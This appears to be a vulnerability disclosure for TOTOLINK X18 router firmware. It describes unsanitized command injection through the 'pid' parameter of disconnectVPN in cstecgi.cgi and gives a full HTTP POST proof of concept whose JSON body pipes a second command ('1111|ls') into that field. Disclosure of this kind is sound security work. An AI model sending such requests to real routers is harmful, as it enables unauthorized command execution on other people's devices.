TOTOLINKļ¼X18 V9.1.0cu.2024_B20220329
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
The pid parameter of disconnectVPN in cstecgi.cgi is controllable, and the input pid is directly spliced with string without any verification, resulting in command execution after calling CsteSystem, and ida does not correctly analyze the parameters of CsteSystem.
CsteSystem comes from the/usr/lib/libcscommon.so. Through analysis, you can know that the command will eventually be executed by calling/bin/bash through execv
Poc:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: <http://192.168.109.161>
Connection: close
Referer: <http://192.168.109.161/advance/remote.html?timestamp=1667552118248>
Cookie: SESSION_ID=2:1667546811:2
{"pid":"1111|ls","topicurl":"disconnectVPN"}
Test screenshot:
